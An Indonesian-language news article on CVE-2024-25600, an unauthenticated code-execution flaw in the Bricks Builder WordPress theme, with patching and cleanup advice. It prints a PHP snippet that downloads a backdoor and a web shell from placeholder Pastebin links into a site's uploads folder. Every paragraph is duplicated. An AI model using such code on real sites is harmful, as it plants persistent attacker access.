WordPress adalah salah satu platform pembuatan situs web yang paling populer di dunia, dengan jutaan pengguna yang menggunakan berbagai tema dan plugin untuk mempercantik dan memperkaya situs mereka. Namun, popularitas WordPress juga membuatnya menjadi sasaran empuk bagi para peretas yang mencari celah keamanan untuk mengeksploitasi situs yang rentan.
.
Salah satu tema WordPress yang baru-baru ini menjadi korban serangan peretas adalah Bricks Builder Theme, sebuah tema premium yang digambarkan sebagai pembuat situs visual yang inovatif dan berbasis komunitas. Tema ini memiliki sekitar 25.000 instalasi aktif, dan menawarkan fitur-fitur menarik seperti desain responsif, editor drag-and-drop, dan integrasi dengan WooCommerce.
Salah satu tema WordPress yang baru-baru ini menjadi korban serangan peretas adalah Bricks Builder Theme, sebuah tema premium yang digambarkan sebagai pembuat situs visual yang inovatif dan berbasis komunitas. Tema ini memiliki sekitar 25.000 instalasi aktif, dan menawarkan fitur-fitur menarik seperti desain responsif, editor drag-and-drop, dan integrasi dengan WooCommerce.
.
Sayangnya, tema ini juga mengandung sebuah kerentanan kritis yang memungkinkan peretas untuk menjalankan kode PHP sembarang tanpa otentikasi. Kerentanan ini, yang dilacak sebagai CVE-2024-25600, memanfaatkan fungsi eval di tema untuk mengeksekusi kode PHP yang dikirim melalui parameter POST. Dengan demikian, peretas dapat mengambil alih situs yang menggunakan tema Bricks Builder, dan melakukan berbagai aksi jahat seperti mengubah konten, menginstal malware, mencuri data, atau bahkan menyebarkan serangan ke situs lain.
Sayangnya, tema ini juga mengandung sebuah kerentanan kritis yang memungkinkan peretas untuk menjalankan kode PHP sembarang tanpa otentikasi. Kerentanan ini, yang dilacak sebagai CVE-2024-25600, memanfaatkan fungsi eval di tema untuk mengeksekusi kode PHP yang dikirim melalui parameter POST. Dengan demikian, peretas dapat mengambil alih situs yang menggunakan tema Bricks Builder, dan melakukan berbagai aksi jahat seperti mengubah konten, menginstal malware, mencuri data, atau bahkan menyebarkan serangan ke situs lain.
.
Kerentanan ini pertama kali dilaporkan oleh peneliti keamanan dari Wordfence pada tanggal 12 Februari 2024, dan segera diperbaiki oleh pengembang tema pada tanggal 13 Februari 2024 dengan merilis versi 1.9.6.1 yang menghapus fungsi eval yang bermasalah. Namun, meskipun perbaikan sudah tersedia, masih ada banyak situs yang belum memperbarui tema mereka, dan menjadi sasaran empuk bagi para peretas yang mencari situs yang rentan.
Kerentanan ini pertama kali dilaporkan oleh peneliti keamanan dari Wordfence pada tanggal 12 Februari 2024, dan segera diperbaiki oleh pengembang tema pada tanggal 13 Februari 2024 dengan merilis versi 1.9.6.1 yang menghapus fungsi eval yang bermasalah. Namun, meskipun perbaikan sudah tersedia, masih ada banyak situs yang belum memperbarui tema mereka, dan menjadi sasaran empuk bagi para peretas yang mencari situs yang rentan.
.
Menurut laporan dari BleepingComputer1 dan Cyware2, para peretas telah secara aktif mengeksploitasi kerentanan ini sejak tanggal 14 Februari 2024, dengan menggunakan alat pemindai otomatis untuk mencari situs yang menggunakan tema Bricks Builder. Jika situs tersebut ditemukan, peretas akan mengirimkan kode PHP jahat yang akan dieksekusi oleh fungsi eval di tema. Kode PHP tersebut dapat berupa backdoor, web shell, atau skrip lain yang dapat memberikan akses dan kontrol penuh kepada peretas.
Menurut laporan dari BleepingComputer1 dan Cyware2, para peretas telah secara aktif mengeksploitasi kerentanan ini sejak tanggal 14 Februari 2024, dengan menggunakan alat pemindai otomatis untuk mencari situs yang menggunakan tema Bricks Builder. Jika situs tersebut ditemukan, peretas akan mengirimkan kode PHP jahat yang akan dieksekusi oleh fungsi eval di tema. Kode PHP tersebut dapat berupa backdoor, web shell, atau skrip lain yang dapat memberikan akses dan kontrol penuh kepada peretas.
.
Salah satu contoh kode PHP yang dikirim oleh peretas adalah sebagai berikut:
Salah satu contoh kode PHP yang dikirim oleh peretas adalah sebagai berikut:
<?php
$backdoor = "https://pastebin.com/raw/xxxxxxxx";
$shell = "https://pastebin.com/raw/yyyyyyyy";
file_put_contents("wp-content/uploads/backdoor.php", file_get_contents($backdoor));
file_put_contents("wp-content/uploads/shell.php", file_get_contents($shell));
?>.
Kode PHP di atas akan mengunduh dua file dari Pastebin, yaitu backdoor.php dan shell.php, dan menyimpannya di direktori wp-content/uploads di situs yang rentan. File backdoor.php berisi kode yang dapat memungkinkan peretas untuk menjalankan perintah sembarang di situs, sedangkan file shell.php berisi antarmuka web yang dapat digunakan oleh peretas untuk mengelola situs.
Kode PHP di atas akan mengunduh dua file dari Pastebin, yaitu backdoor.php dan shell.php, dan menyimpannya di direktori wp-content/uploads di situs yang rentan. File backdoor.php berisi kode yang dapat memungkinkan peretas untuk menjalankan perintah sembarang di situs, sedangkan file shell.php berisi antarmuka web yang dapat digunakan oleh peretas untuk mengelola situs.
.
Untuk menghindari serangan ini, pengguna tema Bricks Builder disarankan untuk segera memperbarui tema mereka ke versi terbaru, yaitu 1.9.6.1, yang sudah tidak mengandung fungsi eval yang bermasalah. Selain itu, pengguna juga disarankan untuk memeriksa situs mereka untuk mencari tanda-tanda kompromi, seperti file yang tidak dikenal, konten yang berubah, atau aktivitas yang mencurigakan. Jika situs sudah terinfeksi, pengguna harus membersihkan situs mereka dari malware, mengubah kata sandi, dan memperkuat keamanan situs mereka.
Untuk menghindari serangan ini, pengguna tema Bricks Builder disarankan untuk segera memperbarui tema mereka ke versi terbaru, yaitu 1.9.6.1, yang sudah tidak mengandung fungsi eval yang bermasalah. Selain itu, pengguna juga disarankan untuk memeriksa situs mereka untuk mencari tanda-tanda kompromi, seperti file yang tidak dikenal, konten yang berubah, atau aktivitas yang mencurigakan. Jika situs sudah terinfeksi, pengguna harus membersihkan situs mereka dari malware, mengubah kata sandi, dan memperkuat keamanan situs mereka.
.
Kerentanan RCE di tema Bricks Builder adalah salah satu contoh dari banyaknya kasus di mana tema atau plugin WordPress menjadi sasaran peretas. Oleh karena itu, pengguna WordPress harus selalu waspada dan berhati-hati dalam memilih dan menggunakan tema atau plugin, dan selalu memperbarui mereka ke versi terbaru yang sudah bebas dari kerentanan. Selain itu, pengguna juga harus menggunakan alat keamanan yang dapat melindungi situs mereka dari serangan-serangan yang berpotensi merusak. Dengan demikian, pengguna dapat menjaga situs mereka tetap aman dan terlindung dari ancaman peretas.
sumber
gambar
Kerentanan RCE di tema Bricks Builder adalah salah satu contoh dari banyaknya kasus di mana tema atau plugin WordPress menjadi sasaran peretas. Oleh karena itu, pengguna WordPress harus selalu waspada dan berhati-hati dalam memilih dan menggunakan tema atau plugin, dan selalu memperbarui mereka ke versi terbaru yang sudah bebas dari kerentanan. Selain itu, pengguna juga harus menggunakan alat keamanan yang dapat melindungi situs mereka dari serangan-serangan yang berpotensi merusak. Dengan demikian, pengguna dapat menjaga situs mereka tetap aman dan terlindung dari ancaman peretas.
sumber
gambar
